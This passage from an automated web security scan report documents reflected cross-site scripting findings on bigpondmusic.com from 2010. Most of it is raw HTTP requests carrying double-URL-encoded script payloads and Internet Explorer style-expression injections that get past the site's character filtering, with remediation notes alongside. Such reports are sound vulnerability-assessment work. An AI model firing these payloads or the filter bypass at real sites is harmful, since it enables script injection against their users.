The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b6e6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebb144c02227 was submitted in the REST URL parameter 1. This input was echoed as 3b6e6"><script>alert(1)</script>bb144c02227 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /bpm3b6e6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebb144c02227/ HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:14:40 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88015
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dea9b'%3b7ad7f43b2b6 was submitted in the REST URL parameter 1. This input was echoed as dea9b';7ad7f43b2b6 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bpmdea9b'%3b7ad7f43b2b6/ HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:14:43 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87636
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
2.213. http://bigpondmusic.com/bpm/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondmusic.com
Path:
/bpm/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4abfe"style%3d"x%3aexpression(alert(1))"b9936b22766 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4abfe"style="x:expression(alert(1))"b9936b22766 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /bpm/?4abfe"style%3d"x%3aexpression(alert(1))"b9936b22766=1 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:14:34 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 94013
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>Bigpond TV - BigPond Music M ...[SNIP]... <input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bpm/?4abfe"style="x:expression(alert(1))"b9936b22766=1" /> ...[SNIP]...
The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bdf7"style%3d"x%3aexpression(alert(1))"754dba681da was submitted in the ref parameter. This input was echoed as 8bdf7"style="x:expression(alert(1))"754dba681da in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /bpm/?ref=Net-Head-Music-bpm8bdf7"style%3d"x%3aexpression(alert(1))"754dba681da HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:14:45 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 93974
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>Bigpond TV - BigPond Music M ...[SNIP]... <input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bpm/?ref=Net-Head-Music-bpm8bdf7"style="x:expression(alert(1))"754dba681da" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 53e51'%3b3973db429e9 was submitted in the REST URL parameter 1. This input was echoed as 53e51';3973db429e9 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse53e51'%3b3973db429e9/Albums/NewRelease/Format-Album/By-ReleaseDate HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:11:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87934
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f08f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e74427646bdf was submitted in the REST URL parameter 1. This input was echoed as 7f08f"><script>alert(1)</script>74427646bdf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /browse7f08f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e74427646bdf/Albums/NewRelease/Format-Album/By-ReleaseDate HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:11:54 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88123
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3996e'%3b4afac108669 was submitted in the REST URL parameter 2. This input was echoed as 3996e';4afac108669 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/Albums3996e'%3b4afac108669/NewRelease/Format-Album/By-ReleaseDate HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:12:10 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88142
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a04e3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e457cc0fd8c6 was submitted in the REST URL parameter 2. This input was echoed as a04e3"><script>alert(1)</script>457cc0fd8c6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /browse/Albumsa04e3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e457cc0fd8c6/NewRelease/Format-Album/By-ReleaseDate HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:12:08 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87985
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5579%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e579f51bad87 was submitted in the REST URL parameter 3. This input was echoed as e5579"><script>alert(1)</script>579f51bad87 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /browse/Albums/NewReleasee5579%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e579f51bad87/Format-Album/By-ReleaseDate HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:12:23 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88323
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 707ba%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252712973b72ab2 was submitted in the REST URL parameter 3. This input was echoed as 707ba'style='x:expression(alert(1))'12973b72ab2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /browse/Albums/NewRelease707ba%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252712973b72ab2/Format-Album/By-ReleaseDate HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:12:31 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88457
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 53e59'%3bf3ee490db89 was submitted in the REST URL parameter 3. This input was echoed as 53e59';f3ee490db89 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/Albums/NewRelease53e59'%3bf3ee490db89/Format-Album/By-ReleaseDate HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:12:33 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88106
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2cf15%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527dd646e40ee3 was submitted in the REST URL parameter 4. This input was echoed as 2cf15'style='x:expression(alert(1))'dd646e40ee3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /browse/Albums/NewRelease/Format-Album2cf15%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527dd646e40ee3/By-ReleaseDate HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:12:54 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88146
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d078c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e72a36c9a5ae was submitted in the REST URL parameter 4. This input was echoed as d078c"><script>alert(1)</script>72a36c9a5ae in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /browse/Albums/NewRelease/Format-Albumd078c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e72a36c9a5ae/By-ReleaseDate HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:12:46 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88405
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d896%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e61bbc99c0ef was submitted in the REST URL parameter 5. This input was echoed as 7d896"><script>alert(1)</script>61bbc99c0ef in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /browse/Albums/NewRelease/Format-Album/By-ReleaseDate7d896%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e61bbc99c0ef HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:13:04 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88428
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 74d3c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252702be3f93632 was submitted in the REST URL parameter 5. This input was echoed as 74d3c'style='x:expression(alert(1))'02be3f93632 in the application's response.
